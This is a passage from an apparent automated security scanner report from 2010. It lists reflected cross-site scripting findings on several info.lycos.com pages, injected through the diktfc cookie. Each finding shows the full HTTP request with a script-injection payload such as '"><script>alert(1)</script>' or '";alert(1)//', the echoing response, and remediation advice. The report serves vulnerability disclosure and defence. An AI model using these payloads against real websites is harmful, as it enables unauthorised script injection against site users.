Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5251b"><script>alert(1)</script>887c4447e55; displayMobile=0; PENTA=174.121.222.18.1292163893857460

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:49 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Curr
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/jobs.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5251b"><script>alert(1)</script>887c4447e55.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.338. http://info.lycos.com/jobs.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /jobs.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d910"%3balert(1)//820c5e59da9 was submitted in the diktfc cookie. This input was echoed as 7d910";alert(1)//820c5e59da9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jobs.php HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7d910"%3balert(1)//820c5e59da9; displayMobile=0; PENTA=174.121.222.18.1292163893857460

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Curr
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/jobs.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7d910";alert(1)//820c5e59da9.lycos.com"
});
</script>
...[SNIP]...

1.339. http://info.lycos.com/legal/legal.asp [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /legal/legal.asp

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1655e"><script>alert(1)</script>bf11cff77f9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /legal/legal.asp HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1655e"><script>alert(1)</script>bf11cff77f9; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/tos.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1655e"><script>alert(1)</script>bf11cff77f9.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.340. http://info.lycos.com/legal/legal.asp [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /legal/legal.asp

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eeb6"%3balert(1)//37ed0722e88 was submitted in the diktfc cookie. This input was echoed as 4eeb6";alert(1)//37ed0722e88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /legal/legal.asp HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4eeb6"%3balert(1)//37ed0722e88; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:36 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/tos.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4eeb6";alert(1)//37ed0722e88.lycos.com"
});
</script>
...[SNIP]...

1.341. http://info.lycos.com/legal/sectoolbar.html [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /legal/sectoolbar.html

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99a57"><script>alert(1)</script>cc300b5c45e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /legal/sectoolbar.html HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A99a57"><script>alert(1)</script>cc300b5c45e; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/tos.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A99a57"><script>alert(1)</script>cc300b5c45e.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.342. http://info.lycos.com/legal/sectoolbar.html [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /legal/sectoolbar.html

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9447b"%3balert(1)//68c9f298253 was submitted in the diktfc cookie. This input was echoed as 9447b";alert(1)//68c9f298253 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /legal/sectoolbar.html HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9447b"%3balert(1)//68c9f298253; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:35 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/tos.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9447b";alert(1)//68c9f298253.lycos.com"
});
</script>
...[SNIP]...

1.343. http://info.lycos.com/life.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /life.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 971b4"%3balert(1)//81f487453e8 was submitted in the diktfc cookie. This input was echoed as 971b4";alert(1)//81f487453e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /life.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A971b4"%3balert(1)//81f487453e8; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Life
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/life.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A971b4";alert(1)//81f487453e8.lycos.com"
});
</script>
...[SNIP]...

1.344. http://info.lycos.com/life.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /life.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35baa"><script>alert(1)</script>9cc8ee2a812 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /life.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35baa"><script>alert(1)</script>9cc8ee2a812; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Life
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/life.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35baa"><script>alert(1)</script>9cc8ee2a812.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.345. http://info.lycos.com/overview.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /overview.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe78f"%3balert(1)//0ed3ac7046c was submitted in the diktfc cookie. This input was echoed as fe78f";alert(1)//0ed3ac7046c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /overview.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe78f"%3balert(1)//0ed3ac7046c; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Comp
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/overview.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe78f";alert(1)//0ed3ac7046c.lycos.com"
});
</script>
...[SNIP]...

1.346. http://info.lycos.com/overview.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /overview.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4900"><script>alert(1)</script>bf225484b1b was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /overview.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad4900"><script>alert(1)</script>bf225484b1b; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Comp
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/overview.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad4900"><script>alert(1)</script>bf225484b1b.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.347. http://info.lycos.com/privacy.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /privacy.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1672b"><script>alert(1)</script>2b55e5b0452 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /privacy.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1672b"><script>alert(1)</script>2b55e5b0452; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/privacy.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1672b"><script>alert(1)</script>2b55e5b0452.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.348. http://info.lycos.com/privacy.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /privacy.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ad88"%3balert(1)//e21d1919c06 was submitted in the diktfc cookie. This input was echoed as 8ad88";alert(1)//e21d1919c06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ad88"%3balert(1)//e21d1919c06; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/privacy.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ad88";alert(1)//e21d1919c06.lycos.com"
});
</script>
...[SNIP]...

1.349. http://info.lycos.com/privacy/privacy.asp [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /privacy/privacy.asp

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 190dd"%3balert(1)//7b5dcd82c26 was submitted in the diktfc cookie. This input was echoed as 190dd";alert(1)//7b5dcd82c26 in the application's response.

